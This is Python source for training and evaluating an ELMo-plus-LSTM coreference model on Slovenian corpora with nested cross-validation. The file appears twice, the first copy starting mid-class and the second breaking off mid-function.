        # Scorer input size is 2 * hidden_size because the LSTM is bidirectional.
        self.scorer = NeuralCoreferencePairScorer(num_features=(2 * hidden_size),
                                                  hidden_size=fc_hidden_size,
                                                  dropout=dropout).to(DEVICE)
        # Per-module learning rates fall back to the global learning rate when
        # no override is present in `layer_learning_rate`.
        params_to_update = [
            {
                "params": self.scorer.parameters(),
                "lr": self.layer_learning_rate.get("lr_scorer", self.learning_rate)
            },
            {
                "params": self.context_encoder.parameters(),
                "lr": self.layer_learning_rate.get("lr_context_encoder", self.learning_rate)
            }
        ]
        if not freeze_pretrained:
            params_to_update.append({
                "params": self.embedder.parameters(),
                "lr": self.layer_learning_rate.get("lr_embedder", self.learning_rate)
            })
        self.optimizer = optim.Adam(params_to_update, lr=self.learning_rate)
        super().__init__(learning_rate=learning_rate, dataset_name=dataset_name, model_name=model_name)
        logging.info(f"Initialized contextual ELMo-based model with name {self.model_name}.")
    @property
    def model_base_dir(self):
        # Base directory name under which checkpoints of this controller type are kept.
        return "contextual_model_elmo"
    def train_mode(self):
        """Put trainable submodules into training mode (a frozen ELMo is left as-is)."""
        if not self.freeze_pretrained:
            self.embedder.train()
        self.context_encoder.train()
        self.scorer.train()
    def eval_mode(self):
        """Put all submodules into evaluation mode."""
        self.embedder.eval()
        self.context_encoder.eval()
        self.scorer.eval()
    def load_checkpoint(self):
        """Load encoder/scorer weights from `self.path_model_dir`, plus fine-tuned
        ELMo weights when an `embeddings.th` file is present (i.e. the model was
        trained with `freeze_pretrained=False`)."""
        self.loaded_from_file = True
        self.context_encoder.load_state_dict(torch.load(os.path.join(self.path_model_dir, "context_encoder.th"),
                                                        map_location=DEVICE))
        self.scorer.load_state_dict(torch.load(os.path.join(self.path_model_dir, "scorer.th"),
                                               map_location=DEVICE))
        path_to_embeddings = os.path.join(self.path_model_dir, "embeddings.th")
        if os.path.isfile(path_to_embeddings):
            logging.info(f"Loading fine-tuned ELMo weights from '{path_to_embeddings}'")
            self.embedder.load_state_dict(torch.load(path_to_embeddings, map_location=DEVICE))
    @staticmethod
    def from_pretrained(model_dir):
        """Re-instantiate a controller from `controller_config.json` inside
        `model_dir` and load its saved weights."""
        controller_config_path = os.path.join(model_dir, "controller_config.json")
        with open(controller_config_path, "r", encoding="utf-8") as f_config:
            pre_config = json.load(f_config)
        instance = ContextualControllerELMo(**pre_config)
        instance.load_checkpoint()
        return instance
    def save_pretrained(self, model_dir):
        """Write the controller config and model weights to disk.

        NOTE(review): the config is written into `model_dir`, but the weight
        files below are written into `self.path_model_dir` — if the two ever
        differ, config and weights end up in different directories. Confirm
        that callers always pass `model_dir == self.path_model_dir`.
        """
        if not os.path.exists(model_dir):
            os.makedirs(model_dir)
        # Write controller config (used for instantiation)
        controller_config_path = os.path.join(model_dir, "controller_config.json")
        with open(controller_config_path, "w", encoding="utf-8") as f_config:
            json.dump({
                "hidden_size": self.hidden_size,
                "dropout": self.dropout,
                "pretrained_embeddings_dir": self.pretrained_embeddings_dir,
                "dataset_name": self.dataset_name,
                "fc_hidden_size": self.fc_hidden_size,
                "freeze_pretrained": self.freeze_pretrained,
                "learning_rate": self.learning_rate,
                "layer_learning_rate": self.layer_learning_rate,
                "max_segment_size": self.max_segment_size,
                "max_span_size": self.max_span_size,
                "model_name": self.model_name
            }, fp=f_config, indent=4)
        torch.save(self.context_encoder.state_dict(), os.path.join(self.path_model_dir, "context_encoder.th"))
        torch.save(self.scorer.state_dict(), os.path.join(self.path_model_dir, "scorer.th"))
        # Save fine-tuned ELMo embeddings only if they're not frozen
        if not self.freeze_pretrained:
            torch.save(self.embedder.state_dict(), os.path.join(self.path_model_dir, "embeddings.th"))
    def save_checkpoint(self):
        """Deprecated alias for ``save_pretrained(self.path_model_dir)``."""
        logging.warning("save_checkpoint() is deprecated. Use save_pretrained() instead")
        self.save_pretrained(self.path_model_dir)
    def _prepare_doc(self, curr_doc: Document) -> Dict:
        """ Returns a cache dictionary with preprocessed data. This should only be called once per document, since
        data inside same document does not get shuffled. """
        ret = {}
        # By default, each sentence is its own segment, meaning sentences are processed independently
        if self.max_segment_size is None:
            def get_position(t):
                # (segment index, position inside segment) = (sentence idx, idx in sentence)
                return t.sentence_index, t.position_in_sentence
            _encoded_segments = batch_to_ids(curr_doc.raw_sentences())
        # Optionally, one can specify max_segment_size, in which case segments of tokens are processed independently
        else:
            def get_position(t):
                # Positions are derived from the flat document offset.
                doc_position = t.position_in_document
                return doc_position // self.max_segment_size, doc_position % self.max_segment_size
            flattened_doc = list(chain(*curr_doc.raw_sentences()))
            # Ceiling division: the last segment may be shorter than max_segment_size.
            num_segments = (len(flattened_doc) + self.max_segment_size - 1) // self.max_segment_size
            _encoded_segments = \
                batch_to_ids([flattened_doc[idx_seg * self.max_segment_size: (idx_seg + 1) * self.max_segment_size]
                              for idx_seg in range(num_segments)])
        encoded_segments = []
        # Convention: Add a PAD word ([0] * max_chars vector) at the end of each segment, for padding mentions
        for curr_sent in _encoded_segments:
            encoded_segments.append(
                torch.cat((curr_sent, torch.zeros((1, ELMoCharacterMapper.max_word_length), dtype=torch.long)))
            )
        encoded_segments = torch.stack(encoded_segments)
        # Map each mention id to its cluster, so gold antecedents can be looked up per head.
        cluster_sets = []
        mention_to_cluster_id = {}
        for i, curr_cluster in enumerate(curr_doc.clusters):
            cluster_sets.append(set(curr_cluster))
            for mid in curr_cluster:
                mention_to_cluster_id[mid] = i
        all_candidate_data = []
        # For each head mention, collect all earlier mentions as candidates
        # (index 0 / `None` is reserved for the dummy "no antecedent" option).
        for idx_head, (head_id, head_mention) in enumerate(curr_doc.mentions.items(), 1):
            gt_antecedent_ids = cluster_sets[mention_to_cluster_id[head_id]]
            # Note: no data for dummy antecedent (len(`features`) is one less than `candidates`)
            candidates, candidate_data = [None], []
            candidate_attention = []
            correct_antecedents = []
            # Two parallel index lists: [segment indices], [positions inside segment].
            curr_head_data = [[], []]
            num_head_words = 0
            for curr_token in head_mention.tokens:
                idx_segment, idx_inside_segment = get_position(curr_token)
                curr_head_data[0].append(idx_segment)
                curr_head_data[1].append(idx_inside_segment)
                num_head_words += 1
            # Truncate long spans; pad short spans (index -1 hits the appended PAD word).
            if num_head_words > self.max_span_size:
                curr_head_data[0] = curr_head_data[0][:self.max_span_size]
                curr_head_data[1] = curr_head_data[1][:self.max_span_size]
            else:
                curr_head_data[0] += [curr_head_data[0][-1]] * (self.max_span_size - num_head_words)
                curr_head_data[1] += [-1] * (self.max_span_size - num_head_words)
            head_attention = torch.ones((1, self.max_span_size), dtype=torch.bool)
            head_attention[0, num_head_words:] = False
            for idx_candidate, (cand_id, cand_mention) in enumerate(curr_doc.mentions.items(), start=1):
                # Only mentions preceding the head are valid antecedent candidates.
                if idx_candidate >= idx_head:
                    break
                candidates.append(cand_id)
                # Maps tokens to positions inside segments (idx_seg, idx_inside_seg) for efficient indexing later
                curr_candidate_data = [[], []]
                num_candidate_words = 0
                for curr_token in cand_mention.tokens:
                    idx_segment, idx_inside_segment = get_position(curr_token)
                    curr_candidate_data[0].append(idx_segment)
                    curr_candidate_data[1].append(idx_inside_segment)
                    num_candidate_words += 1
                if num_candidate_words > self.max_span_size:
                    curr_candidate_data[0] = curr_candidate_data[0][:self.max_span_size]
                    curr_candidate_data[1] = curr_candidate_data[1][:self.max_span_size]
                else:
                    # padding tokens index into the PAD token of the last segment
                    curr_candidate_data[0] += [curr_candidate_data[0][-1]] * (self.max_span_size - num_candidate_words)
                    curr_candidate_data[1] += [-1] * (self.max_span_size - num_candidate_words)
                candidate_data.append(curr_candidate_data)
                curr_attention = torch.ones((1, self.max_span_size), dtype=torch.bool)
                curr_attention[0, num_candidate_words:] = False
                candidate_attention.append(curr_attention)
                is_coreferent = cand_id in gt_antecedent_ids
                if is_coreferent:
                    correct_antecedents.append(idx_candidate)
            # No gold antecedent among the candidates -> the dummy (index 0) is correct.
            if len(correct_antecedents) == 0:
                correct_antecedents.append(0)
            candidate_attention = torch.cat(candidate_attention) if len(candidate_attention) > 0 else []
            all_candidate_data.append({
                "head_id": head_id,
                "head_data": torch.tensor([curr_head_data]),
                "head_attention": head_attention,
                "candidates": candidates,
                "candidate_data": torch.tensor(candidate_data),
                "candidate_attention": candidate_attention,
                "correct_antecedents": correct_antecedents
            })
        ret["preprocessed_segments"] = encoded_segments
        ret["steps"] = all_candidate_data
        return ret
    def _train_doc(self, curr_doc, eval_mode=False):
        """ Trains/evaluates (if `eval_mode` is True) model on specific document.
        Returns predictions, loss and number of examples evaluated. """
        if len(curr_doc.mentions) == 0:
            return {}, (0.0, 0)
        # Preprocessed tensors are cached directly on the Document object, so the
        # expensive _prepare_doc() runs only once per document across epochs.
        if not hasattr(curr_doc, "_cache_elmo"):
            curr_doc._cache_elmo = self._prepare_doc(curr_doc)
        cache = curr_doc._cache_elmo  # type: Dict
        encoded_segments = cache["preprocessed_segments"]
        # Skip building the autograd graph through ELMo when it is frozen.
        if self.freeze_pretrained:
            with torch.no_grad():
                res = self.embedder(encoded_segments.to(DEVICE))
        else:
            res = self.embedder(encoded_segments.to(DEVICE))
        # Note: max_segment_size is either specified at instantiation or (the length of longest sentence + 1)
        embedded_segments = res["elmo_representations"][0]  # [num_segments, max_segment_size, embedding_size]
        (lstm_segments, _) = self.context_encoder(embedded_segments)  # [num_segments, max_segment_size, 2 * hidden_size]
        doc_loss, n_examples = 0.0, len(cache["steps"])
        preds = {}
        for curr_step in cache["steps"]:
            head_id = curr_step["head_id"]
            head_data = curr_step["head_data"]
            candidates = curr_step["candidates"]
            candidate_data = curr_step["candidate_data"]
            correct_antecedents = curr_step["correct_antecedents"]
            # Note: num_candidates includes dummy antecedent + actual candidates
            num_candidates = len(candidates)
            if num_candidates == 1:
                # Only the dummy is available (first mention): no scoring needed.
                curr_pred = 0
            else:
                idx_segment = candidate_data[:, 0, :]
                idx_in_segment = candidate_data[:, 1, :]
                # [num_candidates, max_span_size, embedding_size]
                candidate_data = lstm_segments[idx_segment, idx_in_segment]
                # [1, head_size, embedding_size]
                head_data = lstm_segments[head_data[:, 0, :], head_data[:, 1, :]]
                head_data = head_data.repeat((num_candidates - 1, 1, 1))
                candidate_scores = self.scorer(candidate_data, head_data,
                                               curr_step["candidate_attention"],
                                               curr_step["head_attention"].repeat((num_candidates - 1, 1)))
                # [1, num_candidates]; the dummy antecedent gets a fixed score of 0.
                candidate_scores = torch.cat((torch.tensor([0.0], device=DEVICE),
                                              candidate_scores.flatten())).unsqueeze(0)
                curr_pred = torch.argmax(candidate_scores)
                doc_loss += self.loss(candidate_scores.repeat((len(correct_antecedents), 1)),
                                      torch.tensor(correct_antecedents, device=DEVICE))
            # { antecedent: [mention(s)] } pair
            existing_refs = preds.get(candidates[int(curr_pred)], [])
            existing_refs.append(head_id)
            preds[candidates[int(curr_pred)]] = existing_refs
        if not eval_mode:
            # NOTE(review): if no step had >1 candidate (e.g. a single-mention
            # document), doc_loss is still the float 0.0 and .backward() would
            # raise AttributeError — confirm such documents cannot occur here.
            doc_loss.backward()
            self.optimizer.step()
            self.optimizer.zero_grad()
        return preds, (float(doc_loss), n_examples)
if __name__ == "__main__":
    # Mirror all log output to stdout in addition to any configured handlers.
    logger = logging.getLogger()
    logger.addHandler(logging.StreamHandler(sys.stdout))
    logger.setLevel(logging.INFO)
    args = parser.parse_args()
    # NOTE(review): truthiness check means `--random_seed 0` silently skips
    # seeding — confirm whether 0 should be a valid seed.
    if args.random_seed:
        np.random.seed(args.random_seed)
        torch.random.manual_seed(args.random_seed)
    documents = read_corpus(args.dataset)
    def create_model_instance(model_name, **override_kwargs):
        # Build a controller, letting keyword overrides take precedence over CLI args.
        # Note: 10e-5 == 1e-4 (embedder fine-tuning learning rate).
        return ContextualControllerELMo(model_name=model_name,
                                        fc_hidden_size=override_kwargs.get("fc_hidden_size", args.fc_hidden_size),
                                        hidden_size=override_kwargs.get("hidden_size", args.hidden_size),
                                        dropout=override_kwargs.get("dropout", args.dropout),
                                        pretrained_embeddings_dir="../data/slovenian-elmo",
                                        freeze_pretrained=override_kwargs.get("freeze_pretrained", args.freeze_pretrained),
                                        learning_rate=override_kwargs.get("learning_rate", args.learning_rate),
                                        max_segment_size=override_kwargs.get("max_segment_size", args.max_segment_size),
                                        layer_learning_rate={
                                            "lr_embedder": 10e-5} if not args.freeze_pretrained else None,
                                        dataset_name=override_kwargs.get("dataset", args.dataset))
    # Train model
    if args.dataset == "coref149":
        # Nested cross-validation: OUTER_K train/test folds; within each, INNER_K
        # train/dev folds select the best model, which is then evaluated on test.
        INNER_K, OUTER_K = 3, 10
        logging.info(f"Performing {OUTER_K}-fold (outer) and {INNER_K}-fold (inner) CV...")
        save_path = "cache_run_contextual_elmo_coref149.json"
        if args.kfold_state_cache_path is None:
            # Fresh run: create the fold assignment and a resumable state cache.
            train_test_folds = KFold(n_splits=OUTER_K, shuffle=True).split(documents)
            train_test_folds = [{
                "train_docs": [documents[_i].doc_id for _i in train_dev_index],
                "test_docs": [documents[_i].doc_id for _i in test_index]
            } for train_dev_index, test_index in train_test_folds]
            fold_cache = KFoldStateCache(script_name="contextual_model_elmo.py",
                                         script_args=vars(args),
                                         main_dataset=args.dataset,
                                         additional_dataset=None,
                                         fold_info=train_test_folds)
        else:
            # Resume an interrupted run from its cached fold state.
            fold_cache = KFoldStateCache.from_file(args.kfold_state_cache_path)
            OUTER_K = fold_cache.num_folds
        for curr_fold_data in fold_cache.get_next_unfinished():
            curr_train_dev_docs = list(filter(lambda doc: doc.doc_id in set(curr_fold_data["train_docs"]), documents))
            curr_test_docs = list(filter(lambda doc: doc.doc_id in set(curr_fold_data["test_docs"]), documents))
            logging.info(f"Fold#{curr_fold_data['idx_fold']}...")
            # Inner CV: pick the inner-fold model with the lowest dev loss.
            best_metric, best_name = float("inf"), None
            for idx_inner_fold, (train_index, dev_index) in enumerate(KFold(n_splits=INNER_K).split(curr_train_dev_docs)):
                curr_train_docs = [curr_train_dev_docs[_i] for _i in train_index]
                curr_dev_docs = [curr_train_dev_docs[_i] for _i in dev_index]
                curr_model = create_model_instance(model_name=f"fold{curr_fold_data['idx_fold']}_{idx_inner_fold}")
                dev_loss = curr_model.train(epochs=args.num_epochs, train_docs=curr_train_docs, dev_docs=curr_dev_docs)
                logging.info(f"Fold {curr_fold_data['idx_fold']}-{idx_inner_fold}: {dev_loss: .5f}")
                if dev_loss < best_metric:
                    best_metric = dev_loss
                    best_name = curr_model.path_model_dir
            logging.info(f"Best model: {best_name}, best loss: {best_metric: .5f}")
            # Reload the winning inner model and evaluate it on the held-out test fold.
            curr_model = ContextualControllerELMo.from_pretrained(best_name)
            curr_test_metrics = curr_model.evaluate(curr_test_docs)
            curr_model.visualize()
            # Flatten metric objects into plain floats so they can be JSON-cached.
            curr_test_metrics_expanded = {}
            for metric, metric_value in curr_test_metrics.items():
                curr_test_metrics_expanded[f"{metric}_p"] = float(metric_value.precision())
                curr_test_metrics_expanded[f"{metric}_r"] = float(metric_value.recall())
                curr_test_metrics_expanded[f"{metric}_f1"] = float(metric_value.f1())
            fold_cache.add_results(idx_fold=curr_fold_data["idx_fold"], results=curr_test_metrics_expanded)
            fold_cache.save(save_path)
        # Aggregate per-fold results into mean +- sd per metric.
        logging.info(f"Final scores (over {OUTER_K} folds)")
        aggregated_metrics = {}
        for curr_fold_data in fold_cache.fold_info:
            for metric, metric_value in curr_fold_data["results"].items():
                existing = aggregated_metrics.get(metric, [])
                existing.append(metric_value)
                aggregated_metrics[metric] = existing
        for metric, metric_values in aggregated_metrics.items():
            logging.info(f"- {metric}: mean={np.mean(metric_values): .4f} +- sd={np.std(metric_values): .4f}\n"
                         f"\t all fold scores: {metric_values}")
    else:
        # Non-coref149 datasets use a single train/dev/test split instead of CV.
        logging.info(f"Using single train/dev/test split...")
        if args.fixed_split:
            logging.info("Using fixed dataset split")
            train_docs, dev_docs, test_docs = fixed_split(documents, args.dataset)
        else:
            train_docs, dev_docs, test_docs = split_into_sets(documents, train_prop=0.7, dev_prop=0.15, test_prop=0.15)
        model = create_model_instance(model_name=args.model_name)
        if not model.loaded_from_file:
            model.train(epochs=args.num_epochs, train_docs=train_docs, dev_docs=dev_docs)
            # Reload best checkpoint
            model = ContextualControllerELMo.from_pretrained(model.path_model_dir)
        model.evaluate(test_docs)
        model.visualize()
| import argparse
import json
import logging
import os
import sys
from itertools import chain
from typing import Optional, Dict
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from allennlp.data.token_indexers.elmo_indexer import ELMoCharacterMapper
from allennlp.modules.elmo import Elmo, batch_to_ids
from sklearn.model_selection import KFold
from common import ControllerBase, NeuralCoreferencePairScorer
from utils import split_into_sets, fixed_split, KFoldStateCache
from data import read_corpus, Document
# Command-line interface for training/evaluating the contextual ELMo coreference model.
parser = argparse.ArgumentParser()
parser.add_argument("--model_name", type=str, default=None)
# Model capacity / regularization hyperparameters.
parser.add_argument("--hidden_size", type=int, default=128)
parser.add_argument("--fc_hidden_size", type=int, default=150)
parser.add_argument("--dropout", type=float, default=0.2)
# Optimization settings.
parser.add_argument("--learning_rate", type=float, default=0.001)
parser.add_argument("--num_epochs", type=int, default=10)
parser.add_argument("--max_segment_size", type=int, default=None,
                    help="Size of nonoverlapping segments into which a document will be split, with each segment being "
                         "processed independently. By default, a segment corresponds to a single sentence.")
parser.add_argument("--dataset", type=str, default="coref149")
parser.add_argument("--random_seed", type=int, default=13)
# If set, ELMo weights are kept fixed and only the LSTM encoder + scorer are trained.
parser.add_argument("--freeze_pretrained", action="store_true")
parser.add_argument("--fixed_split", action="store_true")
# Path to a JSON cache allowing an interrupted K-fold CV run to be resumed.
parser.add_argument("--kfold_state_cache_path", type=str, default=None)
# All modules and tensors are placed on the GPU when one is available.
DEVICE = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
class ContextualControllerELMo(ControllerBase):
    """Coreference controller that embeds tokens with (optionally fine-tuned) ELMo,
    contextualizes them with a bidirectional LSTM, and scores mention-pair
    (head, antecedent-candidate) combinations with a NeuralCoreferencePairScorer.

    Documents are processed either sentence-by-sentence (``max_segment_size=None``)
    or in fixed-size token segments; mention spans are truncated/padded to
    ``max_span_size`` positions.
    """
    def __init__(self,
                 hidden_size,
                 dropout,
                 pretrained_embeddings_dir,
                 dataset_name,
                 fc_hidden_size=150,
                 freeze_pretrained=True,
                 learning_rate=0.001,
                 layer_learning_rate: Optional[Dict[str, float]] = None,
                 max_segment_size=None,  # if None, process sentences independently
                 max_span_size=10,
                 model_name=None):
        # Hyperparameters are stored on the instance so save_pretrained() can
        # serialize them into controller_config.json for later re-instantiation.
        self.hidden_size = hidden_size
        self.dropout = dropout
        self.freeze_pretrained = freeze_pretrained
        self.fc_hidden_size = fc_hidden_size
        self.max_span_size = max_span_size
        self.max_segment_size = max_segment_size
        self.learning_rate = learning_rate
        self.layer_learning_rate = layer_learning_rate if layer_learning_rate is not None else {}
        self.pretrained_embeddings_dir = pretrained_embeddings_dir
        # ELMo's internal dropout is only enabled when the embedder is being fine-tuned.
        self.embedder = Elmo(options_file=os.path.join(pretrained_embeddings_dir, "options.json"),
                             weight_file=os.path.join(pretrained_embeddings_dir, "slovenian-elmo-weights.hdf5"),
                             dropout=(0.0 if freeze_pretrained else dropout),
                             num_output_representations=1,
                             requires_grad=(not freeze_pretrained)).to(DEVICE)
        embedding_size = self.embedder.get_output_dim()
        self.context_encoder = nn.LSTM(input_size=embedding_size, hidden_size=hidden_size,
                                       batch_first=True, bidirectional=True).to(DEVICE)
        # Scorer input size is 2 * hidden_size because the LSTM is bidirectional.
        self.scorer = NeuralCoreferencePairScorer(num_features=(2 * hidden_size),
                                                  hidden_size=fc_hidden_size,
                                                  dropout=dropout).to(DEVICE)
        # Per-module learning rates fall back to the global learning rate when
        # no override is present in `layer_learning_rate`.
        params_to_update = [
            {
                "params": self.scorer.parameters(),
                "lr": self.layer_learning_rate.get("lr_scorer", self.learning_rate)
            },
            {
                "params": self.context_encoder.parameters(),
                "lr": self.layer_learning_rate.get("lr_context_encoder", self.learning_rate)
            }
        ]
        if not freeze_pretrained:
            params_to_update.append({
                "params": self.embedder.parameters(),
                "lr": self.layer_learning_rate.get("lr_embedder", self.learning_rate)
            })
        self.optimizer = optim.Adam(params_to_update, lr=self.learning_rate)
        super().__init__(learning_rate=learning_rate, dataset_name=dataset_name, model_name=model_name)
        logging.info(f"Initialized contextual ELMo-based model with name {self.model_name}.")
    @property
    def model_base_dir(self):
        # Base directory name under which checkpoints of this controller type are kept.
        return "contextual_model_elmo"
    def train_mode(self):
        """Put trainable submodules into training mode (a frozen ELMo is left as-is)."""
        if not self.freeze_pretrained:
            self.embedder.train()
        self.context_encoder.train()
        self.scorer.train()
    def eval_mode(self):
        """Put all submodules into evaluation mode."""
        self.embedder.eval()
        self.context_encoder.eval()
        self.scorer.eval()
    def load_checkpoint(self):
        """Load encoder/scorer weights from `self.path_model_dir`, plus fine-tuned
        ELMo weights when an `embeddings.th` file is present (i.e. the model was
        trained with `freeze_pretrained=False`)."""
        self.loaded_from_file = True
        self.context_encoder.load_state_dict(torch.load(os.path.join(self.path_model_dir, "context_encoder.th"),
                                                        map_location=DEVICE))
        self.scorer.load_state_dict(torch.load(os.path.join(self.path_model_dir, "scorer.th"),
                                               map_location=DEVICE))
        path_to_embeddings = os.path.join(self.path_model_dir, "embeddings.th")
        if os.path.isfile(path_to_embeddings):
            logging.info(f"Loading fine-tuned ELMo weights from '{path_to_embeddings}'")
            self.embedder.load_state_dict(torch.load(path_to_embeddings, map_location=DEVICE))
    @staticmethod
    def from_pretrained(model_dir):
        """Re-instantiate a controller from `controller_config.json` inside
        `model_dir` and load its saved weights."""
        controller_config_path = os.path.join(model_dir, "controller_config.json")
        with open(controller_config_path, "r", encoding="utf-8") as f_config:
            pre_config = json.load(f_config)
        instance = ContextualControllerELMo(**pre_config)
        instance.load_checkpoint()
        return instance
    def save_pretrained(self, model_dir):
        """Write the controller config and model weights to disk.

        NOTE(review): the config is written into `model_dir`, but the weight
        files below are written into `self.path_model_dir` — if the two ever
        differ, config and weights end up in different directories. Confirm
        that callers always pass `model_dir == self.path_model_dir`.
        """
        if not os.path.exists(model_dir):
            os.makedirs(model_dir)
        # Write controller config (used for instantiation)
        controller_config_path = os.path.join(model_dir, "controller_config.json")
        with open(controller_config_path, "w", encoding="utf-8") as f_config:
            json.dump({
                "hidden_size": self.hidden_size,
                "dropout": self.dropout,
                "pretrained_embeddings_dir": self.pretrained_embeddings_dir,
                "dataset_name": self.dataset_name,
                "fc_hidden_size": self.fc_hidden_size,
                "freeze_pretrained": self.freeze_pretrained,
                "learning_rate": self.learning_rate,
                "layer_learning_rate": self.layer_learning_rate,
                "max_segment_size": self.max_segment_size,
                "max_span_size": self.max_span_size,
                "model_name": self.model_name
            }, fp=f_config, indent=4)
        torch.save(self.context_encoder.state_dict(), os.path.join(self.path_model_dir, "context_encoder.th"))
        torch.save(self.scorer.state_dict(), os.path.join(self.path_model_dir, "scorer.th"))
        # Save fine-tuned ELMo embeddings only if they're not frozen
        if not self.freeze_pretrained:
            torch.save(self.embedder.state_dict(), os.path.join(self.path_model_dir, "embeddings.th"))
    def save_checkpoint(self):
        """Deprecated alias for ``save_pretrained(self.path_model_dir)``."""
        logging.warning("save_checkpoint() is deprecated. Use save_pretrained() instead")
        self.save_pretrained(self.path_model_dir)
    def _prepare_doc(self, curr_doc: Document) -> Dict:
        """ Returns a cache dictionary with preprocessed data. This should only be called once per document, since
        data inside same document does not get shuffled. """
        ret = {}
        # By default, each sentence is its own segment, meaning sentences are processed independently
        if self.max_segment_size is None:
            def get_position(t):
                # (segment index, position inside segment) = (sentence idx, idx in sentence)
                return t.sentence_index, t.position_in_sentence
            _encoded_segments = batch_to_ids(curr_doc.raw_sentences())
        # Optionally, one can specify max_segment_size, in which case segments of tokens are processed independently
        else:
            def get_position(t):
                # Positions are derived from the flat document offset.
                doc_position = t.position_in_document
                return doc_position // self.max_segment_size, doc_position % self.max_segment_size
            flattened_doc = list(chain(*curr_doc.raw_sentences()))
            # Ceiling division: the last segment may be shorter than max_segment_size.
            num_segments = (len(flattened_doc) + self.max_segment_size - 1) // self.max_segment_size
            _encoded_segments = \
                batch_to_ids([flattened_doc[idx_seg * self.max_segment_size: (idx_seg + 1) * self.max_segment_size]
                              for idx_seg in range(num_segments)])
        encoded_segments = []
        # Convention: Add a PAD word ([0] * max_chars vector) at the end of each segment, for padding mentions
        for curr_sent in _encoded_segments:
            encoded_segments.append(
                torch.cat((curr_sent, torch.zeros((1, ELMoCharacterMapper.max_word_length), dtype=torch.long)))
            )
        encoded_segments = torch.stack(encoded_segments)
        # Map each mention id to its cluster, so gold antecedents can be looked up per head.
        cluster_sets = []
        mention_to_cluster_id = {}
        for i, curr_cluster in enumerate(curr_doc.clusters):
            cluster_sets.append(set(curr_cluster))
            for mid in curr_cluster:
                mention_to_cluster_id[mid] = i
        all_candidate_data = []
        # For each head mention, collect all earlier mentions as candidates
        # (index 0 / `None` is reserved for the dummy "no antecedent" option).
        for idx_head, (head_id, head_mention) in enumerate(curr_doc.mentions.items(), 1):
            gt_antecedent_ids = cluster_sets[mention_to_cluster_id[head_id]]
            # Note: no data for dummy antecedent (len(`features`) is one less than `candidates`)
            candidates, candidate_data = [None], []
            candidate_attention = []
            correct_antecedents = []
            # Two parallel index lists: [segment indices], [positions inside segment].
            curr_head_data = [[], []]
            num_head_words = 0
            for curr_token in head_mention.tokens:
                idx_segment, idx_inside_segment = get_position(curr_token)
                curr_head_data[0].append(idx_segment)
                curr_head_data[1].append(idx_inside_segment)
                num_head_words += 1
            # Truncate long spans; pad short spans (index -1 hits the appended PAD word).
            if num_head_words > self.max_span_size:
                curr_head_data[0] = curr_head_data[0][:self.max_span_size]
                curr_head_data[1] = curr_head_data[1][:self.max_span_size]
            else:
                curr_head_data[0] += [curr_head_data[0][-1]] * (self.max_span_size - num_head_words)
                curr_head_data[1] += [-1] * (self.max_span_size - num_head_words)
            head_attention = torch.ones((1, self.max_span_size), dtype=torch.bool)
            head_attention[0, num_head_words:] = False
            for idx_candidate, (cand_id, cand_mention) in enumerate(curr_doc.mentions.items(), start=1):
                # Only mentions preceding the head are valid antecedent candidates.
                if idx_candidate >= idx_head:
                    break
                candidates.append(cand_id)
                # Maps tokens to positions inside segments (idx_seg, idx_inside_seg) for efficient indexing later
                curr_candidate_data = [[], []]
                num_candidate_words = 0
                for curr_token in cand_mention.tokens:
                    idx_segment, idx_inside_segment = get_position(curr_token)
                    curr_candidate_data[0].append(idx_segment)
                    curr_candidate_data[1].append(idx_inside_segment)
                    num_candidate_words += 1
                if num_candidate_words > self.max_span_size:
                    curr_candidate_data[0] = curr_candidate_data[0][:self.max_span_size]
                    curr_candidate_data[1] = curr_candidate_data[1][:self.max_span_size]
                else:
                    # padding tokens index into the PAD token of the last segment
                    curr_candidate_data[0] += [curr_candidate_data[0][-1]] * (self.max_span_size - num_candidate_words)
                    curr_candidate_data[1] += [-1] * (self.max_span_size - num_candidate_words)
                candidate_data.append(curr_candidate_data)
                curr_attention = torch.ones((1, self.max_span_size), dtype=torch.bool)
                curr_attention[0, num_candidate_words:] = False
                candidate_attention.append(curr_attention)
                is_coreferent = cand_id in gt_antecedent_ids
                if is_coreferent:
                    correct_antecedents.append(idx_candidate)
            # No gold antecedent among the candidates -> the dummy (index 0) is correct.
            if len(correct_antecedents) == 0:
                correct_antecedents.append(0)
            candidate_attention = torch.cat(candidate_attention) if len(candidate_attention) > 0 else []
            all_candidate_data.append({
                "head_id": head_id,
                "head_data": torch.tensor([curr_head_data]),
                "head_attention": head_attention,
                "candidates": candidates,
                "candidate_data": torch.tensor(candidate_data),
                "candidate_attention": candidate_attention,
                "correct_antecedents": correct_antecedents
            })
        ret["preprocessed_segments"] = encoded_segments
        ret["steps"] = all_candidate_data
        return ret
    def _train_doc(self, curr_doc, eval_mode=False):
        """ Trains/evaluates (if `eval_mode` is True) model on specific document.
        Returns predictions, loss and number of examples evaluated. """
        if len(curr_doc.mentions) == 0:
            return {}, (0.0, 0)
        # Preprocessed tensors are cached directly on the Document object, so the
        # expensive _prepare_doc() runs only once per document across epochs.
        if not hasattr(curr_doc, "_cache_elmo"):
            curr_doc._cache_elmo = self._prepare_doc(curr_doc)
        cache = curr_doc._cache_elmo  # type: Dict
        encoded_segments = cache["preprocessed_segments"]
        # Skip building the autograd graph through ELMo when it is frozen.
        if self.freeze_pretrained:
            with torch.no_grad():
                res = self.embedder(encoded_segments.to(DEVICE))
        else:
            res = self.embedder(encoded_segments.to(DEVICE))
        # Note: max_segment_size is either specified at instantiation or (the length of longest sentence + 1)
        embedded_segments = res["elmo_representations"][0]  # [num_segments, max_segment_size, embedding_size]
        (lstm_segments, _) = self.context_encoder(embedded_segments)  # [num_segments, max_segment_size, 2 * hidden_size]
        doc_loss, n_examples = 0.0, len(cache["steps"])
        preds = {}
        for curr_step in cache["steps"]:
            head_id = curr_step["head_id"]
            head_data = curr_step["head_data"]
            candidates = curr_step["candidates"]
            candidate_data = curr_step["candidate_data"]
            correct_antecedents = curr_step["correct_antecedents"]
            # Note: num_candidates includes dummy antecedent + actual candidates
            num_candidates = len(candidates)
            if num_candidates == 1:
                # Only the dummy is available (first mention): no scoring needed.
                curr_pred = 0
            else:
                idx_segment = candidate_data[:, 0, :]
                idx_in_segment = candidate_data[:, 1, :]
                # [num_candidates, max_span_size, embedding_size]
                candidate_data = lstm_segments[idx_segment, idx_in_segment]
                # [1, head_size, embedding_size]
                head_data = lstm_segments[head_data[:, 0, :], head_data[:, 1, :]]
                head_data = head_data.repeat((num_candidates - 1, 1, 1))
                candidate_scores = self.scorer(candidate_data, head_data,
                                               curr_step["candidate_attention"],
